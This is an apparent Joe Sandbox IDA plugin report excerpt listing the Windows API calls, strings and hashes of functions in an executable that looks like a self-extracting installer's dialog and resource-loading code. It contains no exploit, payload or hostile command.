                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
                                              • String ID:
                                              • API String ID: 3462224810-0
                                              • Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                              • Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
                                              • Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
                                              • Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64
                                              APIs
                                              • GetClassNameA.USER32(?,?,00000040), ref: 00401E05
                                              • lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
                                              • GetMenu.USER32(?), ref: 00401E44
                                                • Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
                                                • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
                                                • Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
                                                • Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
                                                • Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
                                                • Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41
                                              • GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
                                              • memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
                                              • CoInitialize.OLE32(00000000), ref: 00401E8C
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
                                              • OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
                                              • GlobalFree.KERNEL32(00000000), ref: 00401ECD
                                                • Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
                                                • Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
                                                • Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
                                                • Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
                                                • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
                                                • Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
                                                • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
                                                • Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
                                                • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
                                                • Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
                                                • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
                                                • Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
                                                • Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
                                                • Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
                                                • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
                                                • Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
                                                • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
                                                • Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
                                                • Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
                                              • SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
                                              • SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
                                              • GlobalFree.KERNEL32(00000000), ref: 00401F3A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
                                              • String ID: IMAGES$STATIC
                                              • API String ID: 4202116410-1168396491
                                              • Opcode ID: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                              • Instruction ID: 08c73d75f8249df6a552952f3d33af28cabbedea74541c6d0cfd8ce2793c0c4e
                                              • Opcode Fuzzy Hash: 352b3c5e08a174ec4a3ffb4ca519ce1611b0b6cc4168eadb64d38ca8f457be46
                                              • Instruction Fuzzy Hash: C7417C71A00218BFCB11DFA1DC49DEEBF7DEF08742B008076FA05A61A0DB758A41DB68
                                              APIs
                                                • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                              • GetDlgItem.USER32(?,000004B8), ref: 0040816A
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00408179
                                              • GetDlgItem.USER32(?,000004B5), ref: 004081C0
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 004081C5
                                              • GetDlgItem.USER32(?,000004B5), ref: 004081D5
                                              • SetWindowLongW.USER32(00000000), ref: 004081D8
                                              • GetSystemMenu.USER32(?,00000000,000004B4,00000000), ref: 004081FE
                                              • EnableMenuItem.USER32(00000000,0000F060,00000001), ref: 00408210
                                              • GetDlgItem.USER32(?,000004B4), ref: 0040821A
                                              • SetFocus.USER32(00000000), ref: 0040821D
                                              • SetTimer.USER32(?,00000001,00000000,00000000), ref: 0040824C
                                              • CoCreateInstance.OLE32(00414C34,00000000,00000001,00414808,00000000), ref: 00408277
                                              • GetDlgItem.USER32(?,00000002), ref: 00408294
                                              • IsWindow.USER32(00000000), ref: 00408297
                                              • GetDlgItem.USER32(?,00000002), ref: 004082A7
                                              • EnableWindow.USER32(00000000), ref: 004082AA
                                              • GetDlgItem.USER32(?,000004B5), ref: 004082BE
                                              • ShowWindow.USER32(00000000), ref: 004082C1
                                                • Part of subcall function 00407134: GetDlgItem.USER32(?,000004B6), ref: 00407142
                                                • Part of subcall function 00407B33: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00407B6D
                                                • Part of subcall function 00407B33: GetDlgItem.USER32(?,000004B8), ref: 00407B8B
                                                • Part of subcall function 00407B33: SendMessageW.USER32(00000000,00000402,00000000,00000000), ref: 00407B9D
                                                • Part of subcall function 00407B33: wsprintfW.USER32 ref: 00407BBB
                                                • Part of subcall function 00407B33: ??3@YAXPAX@Z.MSVCRT(?), ref: 00407C53
                                                • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                                • Part of subcall function 00407D06: LoadIconW.USER32(00000000), ref: 00407D33
                                                • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000032), ref: 00407D43
                                                • Part of subcall function 00407D06: GetSystemMetrics.USER32(00000031), ref: 00407D48
                                                • Part of subcall function 00407D06: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                                • Part of subcall function 00407D06: LoadImageW.USER32(00000000), ref: 00407D54
                                                • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                                • Part of subcall function 00407D06: SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                                • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E76
                                                • Part of subcall function 00407D06: GetWindow.USER32(?,00000005), ref: 00407E92
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: Item$Window$MessageSend$System$EnableHandleLoadLongMenuMetricsModuleShow$??3@CreateFocusIconImageInstanceTimerUnothrow_t@std@@@__ehfuncinfo$??2@wsprintf
                                              • String ID:
                                              • API String ID: 855516470-0
                                              • Opcode ID: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                              • Instruction ID: 3ce0214ef3d03b0ee840dd4ab9c121ae631e901bc0d6870238ad5b6e85178a64
                                              • Opcode Fuzzy Hash: f96aa9b93e1fd9714dbcbc8c2c582c1e46f74a713c41b2300bd45d2dcf84ac32
                                              • Instruction Fuzzy Hash: 014174B0644748ABDA206F65DD49F5B7BADEB40B05F00847DF552A62E1CB79B800CA1C
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,hAA,00000000), ref: 004030F6
                                              • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,hAA,00000000), ref: 004030FE
                                              • strncmp.MSVCRT ref: 004031F1
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00403255
                                              • lstrcmpW.KERNEL32(?,SetEnvironment,00000000), ref: 00403273
                                              • ??3@YAXPAX@Z.MSVCRT(0040414C,?), ref: 00403347
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@$lstrcmpstrncmp
                                              • String ID: GUIFlags$MiscFlags$SetEnvironment$hAA${\rtf
                                              • API String ID: 2881732429-172299233
                                              • Opcode ID: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                              • Instruction ID: da55d09168dcf28f6e950782b6654b171f18f9ca5632fa18d2c46afc5d57570a
                                              • Opcode Fuzzy Hash: 436b0b5fdcd0fc7850317bda0c1040a654aafe726af0558e82b6743448b11ef5
                                              • Instruction Fuzzy Hash: 23819D31900218ABDF11DFA1CD55BEE7B78AF14305F1040ABE8017B2E6DB78AB05DB59
                                              APIs
                                              • GetDlgItem.USER32(?,000004B3), ref: 00406A69
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00406A6E
                                              • GetDlgItem.USER32(?,000004B4), ref: 00406AA5
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00406AAA
                                              • GetSystemMetrics.USER32(00000010), ref: 00406B0B
                                              • GetSystemMetrics.USER32(00000011), ref: 00406B11
                                              • GetSystemMetrics.USER32(00000008), ref: 00406B18
                                              • GetSystemMetrics.USER32(00000007), ref: 00406B1F
                                              • GetParent.USER32(?), ref: 00406B43
                                              • GetClientRect.USER32(00000000,?), ref: 00406B55
                                              • ClientToScreen.USER32(?,?), ref: 00406B68
                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00406BCE
                                              • GetClientRect.USER32(?,?), ref: 00406C55
                                              • ClientToScreen.USER32(?,?), ref: 00406B71
                                                • Part of subcall function 0040690F: GetDlgItem.USER32(?,?), ref: 0040691B
                                              • GetSystemMetrics.USER32(00000008), ref: 00406CD6
                                              • GetSystemMetrics.USER32(00000007), ref: 00406CDD
                                                • Part of subcall function 00406A18: GetDlgItem.USER32(?,?), ref: 00406A36
                                                • Part of subcall function 00406A18: SetWindowPos.USER32(00000000), ref: 00406A3D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                              • String ID:
                                              • API String ID: 747815384-0
                                              • Opcode ID: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                              • Instruction ID: 701d8c843d4ec3579feae24e97f284edc15b0bac0439a5efdbaa5111af673c9b
                                              • Opcode Fuzzy Hash: bdc5cc6ef77edd437f37f749138dc65a224d6988716d71e8386f1ae5cf91717f
                                              • Instruction Fuzzy Hash: 7B912D71A00209AFDB14DFB9CD85AEEB7F9EF48704F148529E642F6290D778E9008B64
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,00000065,000004B7,?,?,?,?,?,0040803E), ref: 00407D30
                                              • LoadIconW.USER32(00000000), ref: 00407D33
                                              • GetSystemMetrics.USER32(00000032), ref: 00407D43
                                              • GetSystemMetrics.USER32(00000031), ref: 00407D48
                                              • GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000,?,?,?,?,?,0040803E), ref: 00407D51
                                              • LoadImageW.USER32(00000000), ref: 00407D54
                                              • SendMessageW.USER32(?,00000080,00000001,?), ref: 00407D79
                                              • SendMessageW.USER32(?,00000080,00000000,?), ref: 00407D89
                                              • GetWindow.USER32(?,00000005), ref: 00407E76
                                              • GetWindow.USER32(?,00000005), ref: 00407E92
                                              • GetWindow.USER32(?,00000005), ref: 00407EAA
                                              • GetModuleHandleW.KERNEL32(00000000,00000065,000004B4,00000000,000004B3,00000000,000004B2,?,000004B7,?,?,?,?,?,0040803E), ref: 00407F0A
                                              • LoadIconW.USER32(00000000), ref: 00407F0D
                                              • GetDlgItem.USER32(?,000004B1), ref: 00407F28
                                              • SendMessageW.USER32(00000000), ref: 00407F2F
                                                • Part of subcall function 0040725A: GetDlgItem.USER32(?,?), ref: 00407264
                                                • Part of subcall function 0040725A: GetWindowTextLengthW.USER32(00000000), ref: 0040726B
                                                • Part of subcall function 0040692C: GetDlgItem.USER32(?,?), ref: 00406939
                                                • Part of subcall function 0040692C: ShowWindow.USER32(00000000,?), ref: 00406950
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: Window$HandleItemLoadMessageModuleSend$IconMetricsSystem$ImageLengthShowText
                                              • String ID:
                                              • API String ID: 1889686859-0
                                              • Opcode ID: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                              • Instruction ID: b6a50195b8a608de49edc5b96f3e83ee8a9b90890169e94b1220211b89b9884f
                                              • Opcode Fuzzy Hash: 54e99e0b53345dbf389ae49fdb6e6d7c6227533794aadf34278c182137d853b4
                                              • Instruction Fuzzy Hash: E861D47064C7096AE9257B61DC4AF3B3699AB40B05F10447FF642B92D2DBBCBC0056AF
                                              APIs
                                              • GetParent.USER32(?), ref: 00406F45
                                              • GetWindowLongW.USER32(00000000), ref: 00406F4C
                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00406F62
                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 00406F7F
                                              • GetSystemMetrics.USER32(00000031), ref: 00406F91
                                              • GetSystemMetrics.USER32(00000032), ref: 00406F98
                                              • GetWindowDC.USER32(?), ref: 00406FAA
                                              • GetWindowRect.USER32(?,?), ref: 00406FB7
                                              • DrawIconEx.USER32(00000000,?,?,?,?,?,00000000,00000000,00000003), ref: 00406FEB
                                              • ReleaseDC.USER32(?,00000000), ref: 00406FF3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                              • String ID:
                                              • API String ID: 2586545124-0
                                              • Opcode ID: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                              • Instruction ID: b1ff7c23223d170b9333fa97acec74f2c9230ee3eabfe87d0be763292bfdf634
                                              • Opcode Fuzzy Hash: 25d202db14ae47cc7765131eef640a3ba3c2163a3dcc7105130798770ded3a1b
                                              • Instruction Fuzzy Hash: 8E210C7650021ABFCF01AFA8DD48DDF7F69FB08351F008565FA15E21A0C775EA209B64
                                              APIs
                                              • GetDlgItem.USER32(?,000004B3), ref: 0040678E
                                              • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067A1
                                              • GetDlgItem.USER32(?,000004B4), ref: 004067AB
                                              • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 004067B3
                                              • SendMessageW.USER32(?,00000401,?,00000000), ref: 004067C3
                                              • GetDlgItem.USER32(?,?), ref: 004067CC
                                              • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 004067D4
                                              • GetDlgItem.USER32(?,?), ref: 004067DD
                                              • SetFocus.USER32(00000000,?,000004B4,74DF0E50,00407E06,000004B4,000004B3,00000000,000004B4,00000000,000004B2,?,000004B7), ref: 004067E0
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ItemMessageSend$Focus
                                              • String ID:
                                              • API String ID: 3946207451-0
                                              • Opcode ID: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                              • Instruction ID: e7a8c5b21de344c7c4c5496bf688f1d5cc3ba414acf11b32f4788b893cc62525
                                              • Opcode Fuzzy Hash: ad16f172208785dca513fa64c118104ef693669a3ac6e088fd96c23032a45483
                                              • Instruction Fuzzy Hash: 6FF04F712403087BEA212B61DD86F5BBA6EEF81B45F018425F340650F0CBF7EC109A28
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?,00000000), ref: 0040C603
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID: IA$IA$IA$IA$IA$IA
                                              • API String ID: 613200358-3743982587
                                              • Opcode ID: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                              • Instruction ID: 4cebfcab61734def35128a955d6a3e34031d8899c11ca8f9bd2aeb72941b6852
                                              • Opcode Fuzzy Hash: 6e54149e8c3d77333b16b378dc95c38791a09178c73359331ff936fd258cd747
                                              • Instruction Fuzzy Hash: D2221671900248DFCB24EF65C8D09EEBBB5FF48304F50852EE91AA7291DB38A945CF58
                                              APIs
                                              • ??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,00417788,00000000,SetEnvironment), ref: 00408479
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID: BeginPrompt$ErrorTitle$FinishMessage$HelpText$SetEnvironment$WarningTitle
                                              • API String ID: 613200358-994561823
                                              • Opcode ID: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                              • Instruction ID: 5566f9f9667118f06bc812855c9affabb63102f3a10b3971892d5eca1131561f
                                              • Opcode Fuzzy Hash: 971dcdd12a827a4034ed94f9ba1d623efd1f14b2bcca4d73e06b44b648e667ed
                                              • Instruction Fuzzy Hash: CA51D47080420AAACF24AB559E85AFB7774EB20348F54443FF881722E1EF7D5D82D64E
                                              APIs
                                              • memcpy.MSVCRT(?,00417410,00000160), ref: 00406DD1
                                              • SystemParametersInfoW.USER32(00000029,00000000,?,00000000), ref: 00406DF0
                                              • GetDC.USER32(00000000), ref: 00406DFB
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00406E07
                                              • MulDiv.KERNEL32(?,00000048,00000000), ref: 00406E16
                                              • ReleaseDC.USER32(00000000,?), ref: 00406E24
                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00406E4C
                                              • DialogBoxIndirectParamW.USER32(00000000,?,?,Function_0000667A), ref: 00406E81
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_6f0slJzOrF.jbxd
                                              Similarity
                                              • API ID: CapsDeviceDialogHandleIndirectInfoModuleParamParametersReleaseSystemmemcpy
                                              • String ID:
                                              • API String ID: 2693764856-0
                                              • Opcode ID: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                              • Instruction ID: b2c1943609947f3a034a1f42a4fd453b3666a2b5c4d4ccfd9a1c2059c5c1cb6f
                                              • Opcode Fuzzy Hash: e70a94c77e8458ae7b0f85d98e5dff18e09bef3a98047e8bed90a0db42bf0d7e
                                              • Instruction Fuzzy Hash: C32184B5500218BFDB215F61DC45EEB7B7CFB08746F0040B6F609A1190D7748E948B65
                                              APIs
                                              • GetDC.USER32(?), ref: 0040696E
                                              • GetSystemMetrics.USER32(0000000B), ref: 0040698A
                                              • GetSystemMetrics.USER32(0000003D), ref: 00406993
                                              • GetSystemMetrics.USER32(0000003E), ref: 0040699B
                                              • SelectObject.GDI32(?,?), ref: 004069B8
                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 004069D3
                                              • SelectObject.GDI32(?,?), ref: 004069F9
                                              • ReleaseDC.USER32(?,?), ref: 00406A08
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1779844775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.1779820883.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779863111.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779881618.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1779910532.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
